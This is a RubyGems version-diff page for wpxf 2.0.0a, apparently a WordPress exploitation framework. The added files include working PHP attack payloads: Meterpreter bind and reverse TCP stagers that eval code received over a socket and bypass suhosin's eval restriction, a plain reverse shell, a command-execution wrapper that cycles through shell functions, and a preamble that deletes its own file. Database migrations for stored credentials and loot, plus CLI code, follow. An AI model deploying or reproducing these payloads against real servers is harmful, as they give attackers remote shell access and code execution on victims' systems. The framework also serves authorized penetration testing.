RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

@@ -0,0 +1,47 @@
+<?php
+  $wpxf_exec = function ($wpxf_cmd) {
+    global $wpxf_disabled;
+    if (is_callable('shell_exec') && !in_array('shell_exec', $wpxf_disabled)) {
+      $wpxf_output = shell_exec($wpxf_cmd);
+    }
+    else if (is_callable('passthru') && !in_array('passthru', $wpxf_disabled)) {
+      ob_start();
+      passthru($wpxf_cmd);
+      $wpxf_output = ob_get_contents();
+      ob_end_clean();
+    }
+    else if (is_callable('system') && !in_array('system', $wpxf_disabled)) {
+      ob_start();
+      system($wpxf_cmd);
+      $wpxf_output = ob_get_contents();
+      ob_end_clean();
+    }
+    else if (is_callable('exec') && !in_array('exec', $wpxf_disabled)) {
+      $wpxf_output = array();
+      exec($wpxf_cmd, $wpxf_output);
+      $wpxf_output = join(chr(10), $wpxf_output).chr(10);
+    }
+    else if (is_callable('proc_open') && !in_array('proc_open', $wpxf_disabled)) {
+      $wpxf_handle = proc_open($wpxf_cmd, array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$wpxf_pipes);
+      $wpxf_output = NULL;
+      while (!feof($wpxf_pipes[1])) {
+        $wpxf_output .= fread($wpxf_pipes[1],1024);
+      }
+      @proc_close($wpxf_handle);
+    }
+    else if (is_callable('popen') && !in_array('popen', $wpxf_disabled)) {
+      $wpxf_fp = popen($wpxf_cmd,'r');
+      $wpxf_output = NULL;
+      if (is_resource($wpxf_fp)) {
+        while (!feof($wpxf_fp)) {
+          $wpxf_output.=fread($wpxf_fp,1024);
+        }
+      }
+      @pclose($wpxf_fp);
+    }
+    else {
+      $wpxf_output = 0;
+    }
+    return $wpxf_output;
+  };
+?>

data/data/php/meterpreter_bind_tcp.php ADDED

@@ -0,0 +1 @@

+ /*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/data/php/meterpreter_bind_tcp_ipv6.php ADDED

@@ -0,0 +1 @@

+ /*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/data/php/meterpreter_reverse_tcp.php ADDED

@@ -0,0 +1 @@

+ /*<?php /**/ error_reporting(0); if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/data/php/preamble.php ADDED

@@ -0,0 +1,17 @@
+<?php
+  @set_time_limit(0);
+  @ignore_user_abort(1);
+  @ini_set('max_execution_time',0);
+  unlink(preg_replace('@\(.*\(.*$@', '', __FILE__));
+  $wpxf_disabled = @ini_get('disable_functions');
+  if (!empty($wpxf_disabled)) {
+    $wpxf_disabled = preg_replace('/[, ]+/', ',', $wpxf_disabled);
+    $wpxf_disabled = explode(',', $wpxf_disabled);
+    $wpxf_disabled = array_map('trim', $wpxf_disabled);
+  }
+  else {
+    $wpxf_disabled = array();
+  }
+?>

data/data/php/reverse_tcp.php ADDED

@@ -0,0 +1,76 @@
+<?php
+  $write_a = null;
+  $error_a = null;
+  if (function_exists('pcntl_fork')) {
+    $pid = pcntl_fork();
+    if ($pid == -1) {
+      exit(1);
+    }
+    if ($pid) {
+      exit(0);
+    }
+    if (posix_setsid() == -1) {
+      exit(1);
+    }
+  }
+  umask(0);
+  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
+  if (!$sock) {
+    exit(1);
+  }
+  $descriptor_spec = array(
+    0 => array("pipe", "r"),
+    1 => array("pipe", "w"),
+    2 => array("pipe", "w")
+  );
+  $process = proc_open($shell, $descriptor_spec, $pipes);
+  if (!is_resource($process)) {
+    exit(1);
+  }
+  stream_set_blocking($pipes[0], 0);
+  stream_set_blocking($pipes[1], 0);
+  stream_set_blocking($pipes[2], 0);
+  stream_set_blocking($sock, 0);
+  while (1) {
+    if (feof($sock)) {
+      break;
+    }
+    if (feof($pipes[1])) {
+      break;
+    }
+    $read_a = array($sock, $pipes[1], $pipes[2]);
+    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+    if (in_array($sock, $read_a)) {
+      $input = fread($sock, $chunk_size);
+      fwrite($pipes[0], $input);
+    }
+    if (in_array($pipes[1], $read_a)) {
+      $input = fread($pipes[1], $chunk_size);
+      fwrite($sock, $input);
+    }
+    if (in_array($pipes[2], $read_a)) {
+      $input = fread($pipes[2], $chunk_size);
+      fwrite($sock, $input);
+    }
+  }
+  fclose($sock);
+  fclose($pipes[0]);
+  fclose($pipes[1]);
+  fclose($pipes[2]);
+  proc_close($process);
+?>

data/db/config.yml ADDED

@@ -0,0 +1,17 @@
+development:
+  adapter: sqlite
+  database:
+  max_connections: 5
+  pool_timeout: 5000
+production:
+  adapter: sqlite
+  database:
+  max_connections: 5
+  pool_timeout: 5000
+test: &test
+  adapter: sqlite
+  database:
+  max_connections: 5
+  pool_timeout: 5000

data/db/env.rb ADDED

@@ -0,0 +1,19 @@
+# frozen_string_literal: true
+ENV['WPXF_ENV'] = 'development' unless ENV['WPXF_ENV']
+# Use the configuration file found in ~/.wpxf/db/config.yml primarily
+# and fall back onto the packaged configuration in db/config.yml.
+db_config_path = File.join(Wpxf.home_directory, 'db', 'config.yml')
+db_config_path = File.join(__dir__, 'config.yml') unless File.exist?(db_config_path)
+db_config = YAML.load_file(db_config_path)[ENV['WPXF_ENV']]
+if db_config['database'].nil?
+  db_config['database'] = File.join(Wpxf.databases_path, "#{ENV['WPXF_ENV']}.db")
+end
+Sequel::Model.plugin :timestamps
+Sequel::Model.db = Sequel.connect(db_config)
+Sequel.extension :migration
+Sequel::Migrator.run(Sequel::Model.db, File.join(__dir__, 'migrations'))

data/db/migrations/001_create_workspaces.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+Sequel.migration do
+  up do
+    create_table :workspaces do
+      primary_key :id
+      column :name, :string, size: 50, null: false
+      column :created_at, :datetime
+    end
+  end
+  down do
+    drop_table :workspaces
+  end
+end

data/db/migrations/002_create_credentials.rb ADDED

@@ -0,0 +1,20 @@
+# frozen_string_literal: true
+Sequel.migration do
+  up do
+    create_table :credentials do
+      primary_key :id
+      foreign_key :workspace_id, :workspaces
+      column :username, :string, size: 250
+      column :password, :string, size: 250
+      column :host, :string, size: 250, null: false
+      column :port, :int, null: false
+      column :created_at, :datetime
+    end
+  end
+  down do
+    drop_table :credentials
+  end
+end

data/db/migrations/003_add_credential_type.rb ADDED

@@ -0,0 +1,13 @@
+# frozen_string_literal: true
+Sequel.migration do
+  up do
+    alter_table :credentials do
+      add_column :type, :string, size: 20
+    end
+  end
+  down do
+    drop_column :credentials, :type
+  end
+end

data/db/migrations/004_add_unique_workspace_name_index.rb ADDED

@@ -0,0 +1,19 @@
+# frozen_string_literal: true
+Sequel.migration do
+  up do
+    alter_table(:workspaces) do
+      add_index :name, unique: true, name: :name_unique_index
+    end
+    from(:workspaces).insert(name: 'default')
+  end
+  down do
+    alter_table(:workspaces) do
+      drop_index :name, name: :name_unique_index
+    end
+    from(:workspaces).select(name: 'default').delete
+  end
+end

data/db/migrations/005_add_logs.rb ADDED

@@ -0,0 +1,16 @@
+# frozen_string_literal: true
+Sequel.migration do
+  up do
+    create_table :logs do
+      primary_key :id
+      column :key, :string, size: 50, unique: true, null: false
+      column :value, :string, size: 100, null: false
+    end
+  end
+  down do
+    drop_table :logs
+  end
+end

data/db/migrations/006_create_modules.rb ADDED

@@ -0,0 +1,18 @@
+# frozen_string_literal: true
+Sequel.migration do
+  up do
+    create_table :modules do
+      primary_key :id
+      column :path, :string, size: 255, null: false, unique: true
+      column :name, :string, size: 255, null: false
+      column :type, :string, size: 11, null: false
+      column :class_name, :string, size: 255, null: false, unique: true
+    end
+  end
+  down do
+    drop_table :modules
+  end
+end

data/db/migrations/007_create_loot_items.rb ADDED

@@ -0,0 +1,21 @@
+# frozen_string_literal: true
+Sequel.migration do
+  up do
+    create_table :loot_items do
+      primary_key :id
+      foreign_key :workspace_id, :workspaces
+      column :path, :string, size: 500, null: false
+      column :notes, :string, size: 100, null: true
+      column :type, :string, size: 50, null: false
+      column :host, :string, size: 250, null: false
+      column :port, :int, null: false
+      column :created_at, :datetime
+    end
+  end
+  down do
+    drop_table :loot_items
+  end
+end

data/lib/wpxf.rb ADDED

@@ -0,0 +1,54 @@
+# frozen_string_literal: true
+require 'date'
+require 'fileutils'
+require 'json'
+require 'time'
+require 'yaml'
+require 'zip'
+# The root namespace.
+module Wpxf
+  def self.gemspec
+    spec_path = File.join(Wpxf.app_path, 'wpxf.gemspec')
+    Gem::Specification.load(spec_path)
+  end
+  def self.data_directory
+    File.join(app_path, 'data')
+  end
+  def self.app_path
+    File.expand_path(File.dirname(__dir__))
+  end
+  def self.version
+    gemspec.version.to_s
+  end
+  def self.home_directory
+    path = File.join(Dir.home, '.wpxf')
+    FileUtils.mkdir_p(path) unless File.directory?(path)
+    path
+  end
+  def self.databases_path
+    path = File.join(home_directory, 'db')
+    FileUtils.mkdir_p(path) unless File.directory?(path)
+    path
+  end
+  def self.change_stdout_sync(enabled)
+    original_setting = STDOUT.sync
+    STDOUT.sync = true
+    yield(enabled)
+    STDOUT.sync = original_setting
+  end
+end
+Wpxf.gemspec.dependencies.each do |d|
+  require d.name unless d.type == :development || d.name == 'rubyzip'
+end
+require_relative '../db/env'
+require 'wpxf/core'

data/lib/wpxf/cli/auto_complete.rb ADDED

@@ -0,0 +1,121 @@
+# frozen_string_literal: true
+module Wpxf
+  module Cli
+    # Functionality for configuring auto-complete functionality in Readline lib.
+    module AutoComplete
+      def setup_auto_complete
+        self.autocomplete_list = build_cmd_list
+        Readline.completer_word_break_characters = ''
+        Readline.completion_append_character = ' '
+        Readline.completion_proc = method(:readline_completion_proc)
+      end
+      def readline_completion_proc(input)
+        res = auto_complete_proc(input, autocomplete_list)
+        return [] unless res
+        res
+      end
+      def build_opts_hash
+        opts_hash = {}
+        return opts_hash unless context
+        mod = context.module
+        opts = mod.options.map(&:name)
+        opts += mod.payload.options.map(&:name) if mod.payload
+        opts.each do |o|
+          opts_hash[o] = {}
+        end
+        opts_hash
+      end
+      def build_payload_names_hash
+        opts_hash = {}
+        return opts_hash unless context&.module&.exploit_module?
+        opts_hash['payload'] = {}
+        Wpxf::Payloads.payload_list.each { |p| opts_hash['payload'][p[:name]] = {} }
+        opts_hash
+      end
+      def refresh_autocomplete_options
+        opts_hash = build_opts_hash.merge(build_payload_names_hash)
+        %w[set unset gset gunset setg unsetg].each do |key|
+          autocomplete_list[key] = opts_hash
+        end
+      end
+      def build_cmd_list
+        cmds = {}
+        permitted_commands.each { |c| cmds[c] = {} }
+        Wpxf::Models::Module.each { |m| cmds['use'][m.path] = {} }
+        cmds['show'] = {
+          'options' => {},
+          'advanced' => {},
+          'exploits' => {},
+          'auxiliary' => {}
+        }
+        cmds
+      end
+      # Process the current CLI input buffer to determine auto-complete options.
+      # @param input [String] the current input buffer.
+      # @param list [Array] the array of auto-complete options.
+      # @return [Array, nil] an array of possible commands.
+      def auto_complete_proc(input, list)
+        res = nil
+        # Nothing on this level, so return previous level.
+        return res if list.keys.empty?
+        # Enumerate each cmd/arg on this level, if there's a match, descend
+        # into the next level and update the return value if anything is
+        # returned and repeat.
+        list.each do |k, v|
+          next unless input =~ /^#{k}\s+/i
+          res = list.keys
+          trimmed_input = input.gsub(/^(#{k}\s+)(.+)/i, '\2')
+          # If there wasn't another level of input, return the list from
+          # the next level as the suggestions. For example, if `input` is
+          # "show " (emphasis on trailing space), then return
+          # ["show options", "show exploits"].
+          if input.eql?(trimmed_input) && !v.keys.empty?
+            res = v.keys.map { |r| input + r }
+          else
+            # If there was another level of input (e.g. "show o"), descend
+            # into that level to find the partial matches (such as "show options").
+            descended_res = auto_complete_proc(trimmed_input, v)
+            if descended_res
+              res = descended_res.grep(/^#{Regexp.escape(trimmed_input)}/)
+              # If we have descended, we'll need to prepend the input that
+              # we trimmed back into the returned results as to not overwrite
+              # the previous levels in STDIN.
+              res = res.map { |r| input.gsub(/^(#{k}\s+)(.+)/i, '\1') + r }
+            else
+              res = res.grep(/^#{Regexp.escape(input)}/)
+            end
+            break
+          end
+        end
+        # If no full matches were found, check if there are partial matches
+        # on the current level, and if so, return the current level as the
+        # list of possible values.
+        unless res
+          grep_res = list.keys.grep(/^#{Regexp.escape(input)}/)
+          res = grep_res if grep_res && !grep_res.empty?
+        end
+        res
+      end
+      attr_accessor :autocomplete_list
+    end
+  end
+end